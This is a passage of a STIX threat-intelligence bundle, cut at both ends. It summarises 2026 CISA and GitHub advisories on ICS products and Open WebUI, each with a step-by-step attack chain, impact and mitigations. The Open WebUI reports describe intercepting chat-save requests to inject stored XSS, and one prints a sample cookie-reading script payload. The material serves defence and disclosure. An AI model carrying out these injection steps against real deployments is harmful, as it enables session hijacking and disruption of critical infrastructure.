      "description": "## Overview\n\nCISA has issued an advisory detailing three critical and high-severity vulnerabilities affecting the Hydro-Québec Le Circuit Electrique charging station backend, specifically in versions released prior to June 2026. These vulnerabilities, identified as CVE-2026-20744 (CVSS 9.8 Critical), CVE-2026-42952 (CVSS 7.5 High), and CVE-2026-44383 (CVSS 7.5 High), could allow remote attackers to achieve privilege escalation or execute denial-of-service attacks. The vulnerabilities stem from improper access control on the websocket endpoint, a lack of throttling for authentication attempts, and allowing multiple connections with the same charging station ID. The affected systems are deployed in Canada within the transportation systems critical infrastructure sector. While no active exploitation has been reported to CISA, the potential impact underscores the importance for operators to apply available mitigations immediately.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies a publicly exposed Hydro-Québec Le Circuit Electrique charging station backend instance.\n2.  **Initial Access (CVE-2026-20744)**: The attacker connects to the charging station's websocket endpoint without authentication, leveraging the Improper Access Control vulnerability (CVE-2026-20744).\n3.  **Privilege Escalation**: Due to the absence of proper authentication, the attacker gains unauthorized access and potentially escalates privileges within the backend system.\n4.  **Impact - DoS via Excessive Authentication (CVE-2026-42952)**: Alternatively, the attacker sends a high volume of repeated authentication attempts to the charging station backend, exploiting CVE-2026-42952, which lacks throttling mechanisms.\n5.  **Impact - DoS via Multiple Connections (CVE-2026-44383)**: Alternatively, the attacker establishes numerous simultaneous connections to the backend using the same charging station ID, exploiting CVE-2026-44383 (Insufficient Session Expiration).\n6.  **Service Disruption**: Both Denial-of-Service vulnerabilities (CVE-2026-42952 and CVE-2026-44383) overwhelm the backend, causing it to become unresponsive or unavailable, disrupting the charging station services.\n7.  **Adverse Impact**: The ultimate objective is either unauthorized control and privilege escalation on the backend system or a denial of service, rendering the charging station backend inoperable for legitimate users and impacting critical transportation services.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could result in severe consequences for the Hydro-Québec Le Circuit Electrique charging station backend, which is part of Canada's critical transportation infrastructure. An attacker could achieve full privilege escalation, gaining unauthorized control over the backend system, potentially manipulating charging operations or accessing sensitive data. Alternatively, denial-of-service attacks could render the charging stations inoperable, preventing users from accessing charging services and causing widespread disruption to electric vehicle infrastructure. While CISA has not reported any known public exploitation, the high CVSS scores and the nature of the vulnerabilities suggest a high potential for significant operational disruption if targeted.\n\n## Recommendation\n\n*   **Apply Patches/Mitigations**: Immediately apply Hydro-Québec's recommended updates which disable OCPP or implement authentication systems for affected charging stations.\n*   **Network Segmentation**: Minimize network exposure for all control system devices and systems, ensuring they are not accessible from the internet, as advised by CISA.\n*   **Firewall \u0026 Isolation**: Locate control system networks and remote devices behind firewalls and isolate them from business networks to limit exposure to CVE-2026-20744, CVE-2026-42952, and CVE-2026-44383.\n*   **Secure Remote Access**: When remote access is required, use secure methods such as Virtual Private Networks (VPNs) and ensure they are updated to the most current version available.\n*   **Monitor for Anomalies**: Continuously monitor network traffic to and from the charging station backend for unusual connection attempts, high volumes of authentication requests, or excessive connections from single IDs that could indicate exploitation of CVE-2026-42952 or CVE-2026-44383.\n",
      "published": "2026-07-07T16:47:40Z",
      "labels": [
        "ics",
        "vulnerability",
        "denial-of-service",
        "privilege-escalation",
        "transportation"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-188-01"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-20744"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42952"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44383"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--03ebf909-dbf9-5c57-be69-4cb269b9a108",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b00dd7ee-693c-584b-8e3d-22c7e4587d3a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1ba7c771-63d3-5540-9f91-bf19fd0a2363",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b00dd7ee-693c-584b-8e3d-22c7e4587d3a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b00dd7ee-693c-584b-8e3d-22c7e4587d3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Digi International PortServer TS and Digi One SP IA Devices",
      "description": "## Overview\n\nThis CISA advisory details multiple vulnerabilities, CVE-2026-12352 and CVE-2026-12948, affecting Digi International PortServer TS, Digi One SP, Digi One SP IA, and Digi One IA devices with firmware versions prior to 2025. An unauthenticated attacker can exploit CVE-2026-12352, an incorrect authorization vulnerability, to bypass authentication on the web management interface and gain access to restricted resources, potentially leading to credential acquisition. CVE-2026-12948 is a stored cross-site scripting (XSS) vulnerability that allows a remote, authenticated administrator to inject malicious scripts into system configuration fields. These scripts then execute in the browser of any user viewing the affected pages. The vulnerabilities pose a significant risk to critical infrastructure sectors including Manufacturing, Communications, Information Technology, and Transportation Systems, with devices deployed worldwide. While no active exploitation has been reported, successful attacks could lead to unauthorized control, data theft, and further compromise of operational technology environments.\n\n## Attack Chain\n\n1.  **Initial Access via Web Interface**: An unauthenticated attacker targets the web management interface of a vulnerable Digi International PortServer TS, Digi One SP, Digi One SP IA, or Digi One IA device.\n2.  **Authentication Bypass (CVE-2026-12352)**: The attacker exploits the incorrect authorization vulnerability (CVE-2026-12352) to bypass the device's authentication mechanisms.\n3.  **Access Restricted Resources**: Upon successful bypass, the attacker gains unauthorized access to restricted administrative resources and potentially sensitive configuration or operational data on the device.\n4.  **Credential Acquisition**: Through access to restricted resources (or other means), the attacker obtains valid administrative credentials for the device.\n5.  **Malicious Script Injection (CVE-2026-12948)**: As an authenticated administrator, the attacker injects malicious scripts (e.g., JavaScript) into system configuration fields through the web management interface, leveraging the stored XSS vulnerability (CVE-2026-12948).\n6.  **Client-Side Script Execution**: A legitimate user, such as an IT or OT operator, views the affected administrative web pages, causing the injected malicious script to execute within their browser session.\n7.  **Browser Session Compromise**: The executed script allows the attacker to steal the legitimate user's session cookies, impersonate the user, or potentially redirect them to malicious sites for further credential phishing.\n8.  **Further Device Control or Data Exfiltration**: Leveraging the compromised session or stolen credentials, the attacker could perform unauthorized configuration changes, exfiltrate sensitive device data, or maintain persistence within the OT network segment.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could lead to significant operational disruptions and security breaches within critical infrastructure sectors globally. An unauthenticated bypass (CVE-2026-12352) grants attackers access to restricted device resources, allowing for potential manipulation or theft of sensitive operational technology data and administrative credentials. The stored cross-site scripting (CVE-2026-12948) further enables attackers to compromise legitimate user browser sessions, potentially leading to additional credential theft or unauthorized actions in the browser context. Affected devices are deployed worldwide across Critical Manufacturing, Communications, Information Technology, and Transportation Systems. Digi International will not provide firmware fixes for CVE-2026-12948 for products nearing end-of-life, increasing long-term risk for organizations unable to upgrade.\n\n## Recommendation\n\n*   Upgrade affected Digi International devices to Digi Connect EZ or Digi Connect EZ TS as a long-term solution recommended by the vendor for CVE-2026-12352 and CVE-2026-12948.\n*   For Digi PortServer TS, enable HTTPS on the web server to mitigate exploitation of CVE-2026-12352 and CVE-2026-12948.\n*   For Digi One SP / Digi One SP IA / Digi One IA, disable the web server when not actively used for configuration to mitigate CVE-2026-12352 and CVE-2026-12948.\n*   Restrict access to the web management interface of affected devices via a firewall or VPN as a compensating control for CVE-2026-12352 and CVE-2026-12948.\n*   Safeguard administrator credentials, as exploitation of CVE-2026-12948 requires authenticated administrator access for script injection.\n*   Deploy affected devices on trusted network segments, ensuring they are not exposed to untrusted or public networks, as a general recommended practice for all vulnerabilities discussed.\n",
      "published": "2026-07-07T16:49:26Z",
      "labels": [
        "ics",
        "ot",
        "network",
        "webserver",
        "vulnerability",
        "authentication-bypass",
        "xss",
        "critical-manufacturing",
        "communications",
        "information-technology",
        "transportation-systems"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-188-07"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-12352"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-12948"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ec23104-4b42-54cd-8054-4fed287b5b42",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc58af20-9411-55b9-bdff-77df53ead619",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04f127e1-51bf-5cb8-9da1-f79ff15228b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc58af20-9411-55b9-bdff-77df53ead619",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fc58af20-9411-55b9-bdff-77df53ead619",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Arbitrary Code Execution Vulnerabilities in Labcenter Proteus 9",
      "description": "## Overview\n\nLabcenter Proteus 9, specifically version 9.1_SP4_Build_42914, is affected by three high-severity vulnerabilities: CVE-2026-42953 (out-of-bounds write), CVE-2026-49033 (stack-based buffer overflow), and CVE-2026-42958 (use-after-free). These flaws, reported by Michael Heinzl and disclosed by CISA on July 7, 2026, could enable a local attacker to execute arbitrary code or disclose sensitive information. Exploitation requires user interaction, typically by opening a specially crafted project file. While these vulnerabilities affect critical infrastructure sectors globally, CISA has not observed in-the-wild exploitation, and the vulnerabilities are not remotely exploitable.\n\n## Attack Chain\n\n1. An attacker crafts a malicious Labcenter Proteus project file (e.g., .pdsprj, .lib) designed to trigger a memory corruption vulnerability.\n2. The attacker delivers the malicious file to the victim, often via spearphishing attachments or a compromised download site.\n3. The victim opens the specially crafted project file using the vulnerable Labcenter Proteus 9.1_SP4_Build_42914 application.\n4. During file parsing, one of the vulnerabilities (CVE-2026-42953, CVE-2026-49033, or CVE-2026-42958) is triggered within the application's memory space.\n5. The memory corruption is leveraged by the attacker to achieve arbitrary code execution within the context of the running Proteus application.\n6. The attacker's arbitrary code executes, allowing for potential information disclosure or further compromise of the underlying system.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could result in arbitrary code execution, allowing an attacker to take control of the affected system, disclose sensitive data, or install additional malicious software. The targeted sectors include critical infrastructure like Communications, Critical Manufacturing, Energy, Healthcare and Public Health, Transportation Systems, and Water and Wastewater, making the potential impact severe if systems within these environments are compromised. While no active exploitation has been reported, the high CVSS scores (7.8/8.4) underscore the risk of compromise within local environments.\n\n## Recommendation\n\n* Immediately update Labcenter Proteus 9 to version 9.2 SPO or later to remediate CVE-2026-42953, CVE-2026-49033, and CVE-2026-42958.\n* Implement robust endpoint detection and response (EDR) solutions to monitor for suspicious process creation or anomalous behavior originating from the Proteus application.\n* Educate users on the risks of opening unsolicited or untrusted project files (e.g., .pdsprj) to prevent initial access via user interaction, as described in CISA's recommended practices.\n* Minimize network exposure for all control system devices and systems running Proteus, ensuring they are not internet-accessible as recommended by CISA (ICSA-26-188-06).\n",
      "published": "2026-07-07T16:50:35Z",
      "labels": [
        "ics",
        "ot",
        "software-vulnerability",
        "cve",
        "code-execution",
        "information-disclosure"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-188-06"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42953"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49033"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42958"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--05c9ee42-89b4-57c8-a0fc-7f031f825405",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Sniffing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1040",
          "url": "https://attack.mitre.org/techniques/T1040"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f98300e2-70c2-5d1c-8a9f-f99ca34b29e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08b891bf-229f-51ad-8dda-eb6be821a303",
      "target_ref": "attack-pattern--05c9ee42-89b4-57c8-a0fc-7f031f825405"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2dff22d3-eb0a-513b-8e4e-84d8157afd64",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08b891bf-229f-51ad-8dda-eb6be821a303",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--08b891bf-229f-51ad-8dda-eb6be821a303",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hitachi Energy PROMOD V Insecure HTTP Transmission Vulnerability (CVE-2026-10763)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-10763, has been identified in Hitachi Energy PROMOD V software, affecting versions 1.0.10 and prior. This vulnerability stems from the product's reliance on insecure HTTP communication with its third-party Digipede server, rather than encrypted HTTPS. Attackers with network access can exploit this weakness to intercept or manipulate sensitive data transmitted between the PROMOD V client and the Digipede server. Such interception could lead to credential theft, session hijacking, or unauthorized access to the PROMOD V system, posing a significant risk to industrial control systems. The vulnerability impacts the energy sector worldwide, as PROMOD V is deployed globally in critical infrastructure environments. The CISA advisory, published on 2026-07-07, highlights the need for immediate remediation.\n\n## Attack Chain\n\n1.  **Network Access**: An attacker gains access to the same network segment where Hitachi Energy PROMOD V clients communicate with the Digipede server. This could be achieved through various means, including compromise of a network device or insider threat.\n2.  **Traffic Interception**: The attacker initiates network sniffing to monitor unencrypted HTTP traffic flowing between PROMOD V and the Digipede server.\n3.  **Data Capture**: The attacker successfully captures sensitive data such as authentication credentials, session tokens, or operational parameters exchanged over the insecure HTTP connection.\n4.  **Credential Theft/Session Hijacking**: Using the captured credentials or session tokens, the attacker compromises legitimate user accounts or hijacks active user sessions within the PROMOD V system.\n5.  **Unauthorized Access**: The attacker leverages the stolen credentials or hijacked session to gain unauthorized access to the PROMOD V application, enabling them to view, modify, or disrupt critical energy grid operations.\n\n## Impact\n\nThe exploitation of CVE-2026-10763 can have severe consequences for organizations utilizing Hitachi Energy PROMOD V, particularly within the energy sector. Successful attacks could result in the theft of sensitive operational data, unauthorized control over industrial processes, or significant disruption to critical infrastructure. The vulnerability's global deployment in the energy sector suggests a broad potential victim scope. The direct impact includes loss of confidentiality and integrity of data, potential for system downtime, and compromise of operational technology (OT) environments, leading to economic losses and safety risks.\n\n## Recommendation\n\n*   Upgrade Hitachi Energy PROMOD V to version 1.0.11 or later to remediate CVE-2026-10763, and ensure HTTPS is enabled on the Digipede server as per the vendor's guidance.\n*   Implement network segmentation to isolate PROMOD V and Digipede server communications from less secure networks, limiting attacker reach as a mitigation for CVE-2026-10763.\n*   Deploy firewalls with strict egress and ingress rules to protect control system networks from external threats, reducing the risk of an attacker gaining the necessary network access to exploit CVE-2026-10763.\n*   Utilize Virtual Private Networks (VPNs) for any remote access to PROMOD V systems, ensuring all communication channels are encrypted to prevent data interception related to CVE-2026-10763.\n",
      "published": "2026-07-07T16:51:30Z",
      "labels": [
        "ics",
        "ot",
        "vulnerability",
        "http-insecurity",
        "data-in-transit",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--05c9ee42-89b4-57c8-a0fc-7f031f825405",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-188-02"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10763"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b257fc90-4316-5cfc-ace0-3b8f3c5bc01e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bbd2320d-ed22-52ee-9d20-642100b10209",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--297fb2f5-cff0-54b4-9a5d-e88a6b23441a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bbd2320d-ed22-52ee-9d20-642100b10209",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--03ef3054-1f2d-56ae-9442-bfb6791c65a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bbd2320d-ed22-52ee-9d20-642100b10209",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d9fefeb1-1b10-589e-b9f1-eb09a1f059c6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bbd2320d-ed22-52ee-9d20-642100b10209",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bbd2320d-ed22-52ee-9d20-642100b10209",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open WebUI Stored XSS via iFrame Embeds (CVE-2026-26193)",
      "description": "## Overview\n\nA critical stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2026-26193, has been discovered in Open WebUI versions up to and including 0.6.43. This flaw allows attackers to inject malicious code into chat response messages by manually manipulating the chat history to set a user-controlled `embeds` property. The injected content is rendered within an iFrame whose sandbox attributes (`allow-scripts` and `allow-same-origin`) are hardcoded as true, effectively nullifying security protections. This bypass enables arbitrary JavaScript execution in the context of the user's browser. The vulnerability poses a significant risk as it can lead to session hijacking for low-privilege users by exfiltrating local storage tokens, and for administrators, it could pave the way for Remote Code Execution (RCE) on the server, as highlighted by related vulnerabilities. The malicious chat can be persistently stored and subsequently shared with other users, allowing the attack to propagate across the platform.\n\n## Attack Chain\n\n1.  **Initial Access / Pre-computation**: An attacker with legitimate user access to Open WebUI initiates a new chat session or interacts with an existing one.\n2.  **Manipulation**: The attacker edits a model's response within a chat, preparing to inject malicious content.\n3.  **Request Interception**: Using an HTTP proxy tool (e.g., Burp Suite, Caido, ZAP), the attacker intercepts the HTTP POST request sent to the server to save the modified chat history.\n4.  **Payload Injection**: Within the intercepted request body, the attacker locates the specific `messages` object corresponding to the edited text and manually adds an `embeds` key containing a malicious JavaScript payload.\n5.  **Persistence**: The manipulated HTTP request, now containing the XSS payload, is forwarded to the Open WebUI server, which saves the chat history, persistently storing the malicious content.\n6.  **Exploitation**: Upon refreshing the chat page or when another user views the shared malicious chat, the Open WebUI frontend renders the stored `embeds` content within an iFrame.\n7.  **Sandbox Bypass \u0026 Execution**: Due to misconfigured iFrame sandbox attributes (`allow-scripts` and `allow-same-origin` are hardcoded as true), the malicious JavaScript executes unhindered in the context of the victim's browser.\n8.  **Impact**: The executed script performs actions such as exfiltrating the victim's session tokens from local storage (leading to session hijacking) or, if the victim is an administrator, potentially triggering a remote code execution vulnerability on the server.\n\n## Impact\n\nThe vulnerability allows any authenticated user to create a weaponized chat that can be persistently stored and shared, enabling attacks against other users. Low-privilege users face a risk of session takeover if their session tokens are exfiltrated from local storage to an attacker-controlled server. For administrators, the vulnerability introduces a pathway to exposing the server to Remote Code Execution (RCE), building upon chains described in related vulnerabilities like GHSA-w7xj-8fx7-wfch. Successful exploitation grants attackers unauthorized access to user sessions and potentially server control, leading to data breaches, unauthorized modifications, or further system compromise.\n\n## Recommendation\n\n*   Patch CVE-2026-26193 on all Open WebUI instances immediately by updating to a version greater than 0.6.43.\n*   Review web application logs and WAF/API gateway logs for unusual POST requests to chat saving endpoints (`/api/chat/`) that contain the 'embeds' keyword in the request body, which could indicate exploitation attempts of the vulnerability described in this brief.\n",
      "published": "2026-07-07T16:55:24Z",
      "labels": [
        "xss",
        "web-application",
        "open-webui",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vjm7-m4xh-7wrc"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d14ecbf1-b656-5a04-b4cf-dfd1ca91de86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b6d051ac-d82f-5984-852f-c38ecf316a33",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eb84a7b3-9c9a-52f1-aec4-20d19271c01f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b6d051ac-d82f-5984-852f-c38ecf316a33",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b6d051ac-d82f-5984-852f-c38ecf316a33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open WebUI Vulnerable to Stored Cross-Site Scripting (XSS) via iFrame in Citations Model",
      "description": "## Overview\n\nOpen WebUI is vulnerable to a high-severity stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2026-26192, stemming from insecure iFrame rendering in its citation model. An authenticated attacker can exploit this by intercepting and modifying HTTP requests when saving chat history to inject malicious HTML content into document metadata, specifically by adding `html: true` and embedding an XSS payload. When another user, particularly an administrator, views a citation containing this weaponized document within a shared chat, the vulnerable Open WebUI frontend renders the content in an iFrame with insufficient sandboxing (`allow-scripts` and `allow-same-origin` are hardcoded), allowing the XSS payload to execute. This can lead to session hijacking, exfiltration of sensitive information, or, in the case of an administrator, potential server-side Remote Code Execution (RCE) by leveraging other known vulnerabilities. The vulnerability affects `pip/open-webui` versions prior to 0.7.0.\n\n## Attack Chain\n\n1.  An authenticated attacker logs into Open WebUI and initiates a new chat session.\n2.  The attacker attaches an arbitrary file as a \"document source\" to the chat.\n3.  While saving the chat history or message, the attacker uses an HTTP proxy tool (e.g., Burp Suite, Caido, ZAP) to intercept the outgoing save request.\n4.  Within the intercepted request's JSON body, the attacker locates the object corresponding to the document source within the `history` and `messages` objects.\n5.  The attacker modifies this object by adding `html: true` to its metadata and injects an XSS payload (e.g., `\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`) into the document content field.\n6.  The attacker forwards the modified HTTP request, causing the Open WebUI server to store the malicious chat history with the embedded XSS payload.\n7.  The attacker shares the link to this weaponized chat with a victim user (e.g., via a phishing link).\n8.  When the victim accesses the shared chat and clicks on the malicious document citation, the Open WebUI frontend renders the content in an insecure iFrame, executing the attacker's JavaScript payload in the victim's browser context.\n\n## Impact\n\nSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary client-side JavaScript code in the context of the victim's browser session. For low-privilege users, this can lead to session takeover, allowing the attacker to read session tokens from local storage and exfiltrate them to an attacker-controlled server. If an 